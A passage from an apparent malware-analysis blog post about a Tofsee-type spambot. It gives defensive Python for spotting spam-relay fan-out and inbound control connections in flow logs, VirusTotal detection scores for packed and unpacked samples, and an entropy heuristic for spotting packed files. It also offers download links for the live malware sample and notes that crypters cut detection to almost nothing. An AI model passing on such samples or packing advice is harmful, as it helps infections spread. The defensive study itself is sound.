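1353085201.40 192.168.7.84 1052 203.0.113.12 25 tcp
1353085202.02 192.168.7.84 1053 192.168.7.1 53 udp
1353085230.77 188.40.81.203 45122 192.168.7.84 1053 tcp
1353085240.00 192.168.7.10 1100 192.168.7.25 25 tcp
1353085241.00 192.168.7.25 2200 203.0.113.50 25 tcp
"""

# Assumed site layout: internal ranges, and the hosts allowed to send mail directly.
INTERNAL_NETS = [ipaddress.ip_network("192.168.0.0/16"), ipaddress.ip_network("10.0.0.0/8")]
KNOWN_MTAS = {"192.168.7.25"}


def parse_flows(text: str) -> List[Dict[str, object]]:
    """Parse the simple six-column flow format into dicts."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, sport, dst, dport, proto = line.split()
        flows.append({"ts": float(ts), "src": src, "sport": int(sport),
                      "dst": dst, "dport": int(dport), "proto": proto})
    return flows


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def detect_spam_relays(flows: List[Dict[str, object]], min_distinct: int = 5) -> Dict[str, List[str]]:
    """Internal hosts that are not known MTAs yet open TCP/25 to many distinct external servers.

    A workstation normally submits mail to one internal relay; a spambot talks to the
    MX of every recipient domain itself, which is the fan-out counted here.
    """
    peers = defaultdict(set)
    for f in flows:
        if f["proto"] != "tcp" or f["dport"] != 25:
            continue
        if not is_internal(f["src"]) or f["src"] in KNOWN_MTAS or is_internal(f["dst"]):
            continue
        peers[f["src"]].add(f["dst"])
    return {src: sorted(dsts) for src, dsts in peers.items() if len(dsts) >= min_distinct}


def detect_inbound_control(flows: List[Dict[str, object]], port: int = 1053) -> List[Tuple[str, str]]:
    """External hosts connecting in to the remote-control port observed in the write-up."""
    return sorted({(f["src"], f["dst"]) for f in flows
                   if f["proto"] == "tcp" and f["dport"] == port
                   and not is_internal(f["src"]) and is_internal(f["dst"])})


if __name__ == "__main__":
    flows = parse_flows(SAMPLE_FLOWS)
    for host, servers in detect_spam_relays(flows).items():
        print(f"possible spam relay {host}: {len(servers)} distinct SMTP servers {servers}")
    for src, dst in detect_inbound_control(flows):
        print(f"inbound remote-control connection {src} -> {dst}:1053")
```

On a real network the same logic is usually a one-line egress rule as well: only the known MTAs may initiate outbound TCP/25, which both blocks the relay traffic and makes the attempt itself the alert.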

Malware Detection Reference Analysis

VirusTotal provides a very good baseline detection ratio for new malware, to measure the response of AntiVirus products against a new threat. I often use VT as a reference for timely monitoring of malware detection. At the time this sample was checked, the VT score of the malware binary was 3/44:
MD5: 268bece218187c189c2322d6f7d21efb File size: 146.4 KB ( 149879 bytes ) File name: unixfreaxjp-sample3 File type: Win32 EXE Detection: 3 / 44 Analysis date: 2012-11-16 14:02:11 UTC ( 0 minutes ago ) URL ---->>>>>>>[CLICK]
@Xylit0l uploaded the unpacked binary, which VT detected at 27 / 44:
MD5: 09a18c6e09bb880922e9ed451d6eb6a0 File size: 68.0 KB ( 69632 bytes ) File name: Dumpedfinal_.exe File type: Win32 EXE Tags: peexe Detection: 27 / 44 Analysis date: 2012-11-17 07:13:25 UTC ( 1 hour, 23 minutes ago ) URL ---->>>>>>>>[CLICK]
↑But the detection names are so confusing; not one of them mentions the SpamBot at all↓
MicroWorld-eScan : Gen:Win32.ExplorerHijack.eqX@aWv8eAi
McAfee           : Artemis!09A18C6E09BB
K7AntiVirus      : Trojan-Downloader
F-Prot           : W32/Bloop.A.gen!Eldorado
Symantec         : Infostealer
Norman           : W32/Malware
TotalDefense     : Win32/Tofsee!generic
Kaspersky        : HEUR:Trojan.Win32.Generic
BitDefender      : Gen:Win32.ExplorerHijack.eqX@aWv8eAi
Sophos           : Sus/Behav-169
F-Secure         : Gen:Win32.ExplorerHijack.eqX@aWv8eAi
DrWeb            : Trojan.Spambot.11176
VIPRE            : BehavesLike.Win32.Malware.eah (mx-v)
AntiVir          : TR/Hijacker.Gen
McAfee-GW-Edition: Artemis!09A18C6E09BB
Emsisoft         : Gen:Win32.ExplorerHijack.eqX@aWv8eAi (B)
ESET-NOD32       : a variant of Win32/Agent.OBA
Kingsoft         : Win32.Troj.Undef.(kcloud)
Microsoft        : Backdoor:Win32/Tofsee.F
AhnLab-V3        : Spyware/Win32.Generic
GData            : Gen:Win32.ExplorerHijack.eqX@aWv8eAi
Commtouch        : W32/Bloop.A.gen!Eldorado
ByteHero         : Virus.Win32.Heur.c
PCTools          : Trojan-PSW.Generic!rem
Rising           : Backdoor.Tofsee!2B2B
AVG              : unknown virus Win32/DH{AAkP}
Panda            : Trj/CI.A
We must learn that a malware with a 27/44 detection ratio can be packed with a crypter into a different binary that gets almost zero detection, for infection purposes. [POINT!] I also uploaded the exploit kit's obfuscated JavaScript infector to VT and, with no shock at all, as expected, the score was only 0/44:
MD5: 4396ab2186b4358e2698c1665a16298d File size: 5.0 KB ( 5130 bytes ) File name: sample2 File type: HTML Detection: 0 / 44 Analysis date: 2012-11-17 07:45:09 UTC ( 0 minutes ago ) URL ---->>>>>>>>[CLICK]
↑So this is why so many people get infected so easily. If we count the infection timeline well, the binary was compiled on the 15th and started being exposed on the 16th-17th. Don't you wonder how many people got infected by this malware during the 2+ (two) days it went undetected?
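The packed-vs-unpacked gap described above is exactly why signature ratios are a poor triage signal on their own; a crypter hides the 27/44 body behind a stub plus an encrypted blob, and what survives the packing is the blob's high entropy. The following is an added Python example of my own (not the blog's tooling, and no relation to the samples' real layout) showing the Shannon-entropy heuristic a triage pipeline uses to flag such a file and to locate where the encrypted payload sits. The input is constructed: a low-entropy text region followed by a deterministic pseudo-random region standing in for the crypted payload.

```python
import hashlib
import math
from typing import List, Tuple


def _pseudo_random(n: int, seed: bytes = b"crypter-demo") -> bytes:
    """Deterministic high-entropy bytes (SHA-256 chain) standing in for an encrypted payload."""
    out = bytearray()
    block = seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out.extend(block)
    return bytes(out[:n])


# Constructed sample: 2 KiB of repetitive text (like a stub's strings/code) followed by
# 2 KiB of pseudo-random bytes (like the crypter's encrypted body).
PLAIN = (b"This program cannot be run in DOS mode.\r\n" * 64)[:2048]
PACKED = _pseudo_random(2048)
BLOB = PLAIN + PACKED


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 for empty input, 8.0 for perfectly uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def high_entropy_regions(data: bytes, window: int = 512, step: int = 512,
                         threshold: float = 7.0) -> List[Tuple[int, int, float]]:
    """Slide a window over the data and merge adjacent windows above the threshold.

    Returns (start, end, mean_entropy) per merged region.  Compressed or encrypted
    payloads score close to 8; code and text usually stay well under 6.5, so 7.0 is a
    conservative cut-off for 512-byte windows.
    """
    regions: List[Tuple[int, int, List[float]]] = []
    for start in range(0, len(data), step):
        chunk = data[start:start + window]
        if len(chunk) < window:
            break
        h = shannon_entropy(chunk)
        if h < threshold:
            continue
        end = start + window
        if regions and regions[-1][1] >= start:
            s, _, hs = regions[-1]
            regions[-1] = (s, end, hs + [h])
        else:
            regions.append((start, end, [h]))
    return [(s, e, round(sum(hs) / len(hs), 2)) for s, e, hs in regions]


def packed_ratio(data: bytes) -> float:
    """Fraction of the file covered by high-entropy regions; a crypted PE is mostly payload."""
    if not data:
        return 0.0
    covered = sum(e - s for s, e, _ in high_entropy_regions(data))
    return covered / len(data)


if __name__ == "__main__":
    print(f"plain text entropy : {shannon_entropy(PLAIN):.2f} bits/byte")
    print(f"packed blob entropy: {shannon_entropy(PACKED):.2f} bits/byte")
    for s, e, h in high_entropy_regions(BLOB):
        print(f"high-entropy region 0x{s:x}-0x{e:x} (mean {h})")
    print(f"packed ratio: {packed_ratio(BLOB):.2f}")
```

The heuristic says nothing about what the payload does; it only tells you this file deserves the unpacking step that produced the 27/44 result, which is the point of the two VT scores above.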

Resources and samples

For research and study purposes we decided to share our analysis data, as written in the details below. Use this data to analyze the malware by yourself, and kindly inform us if you find a different result by commenting on this blog. The sample can be downloaded here -->>[CLICK] The unpacked sample (thanks to @Xylit0l) can be downloaded here -->>[CLICK] The PCAP/network traffic can be downloaded here -->>[CLICK] The full Regshot data can be downloaded here -->>[CLICK]

Reference & studies

Anubis sandbox result (not so useful) is here -->>[CLICK] Comodo sandbox result (not so useful) is here -->>[CLICK]
#MalwareMustDie!!!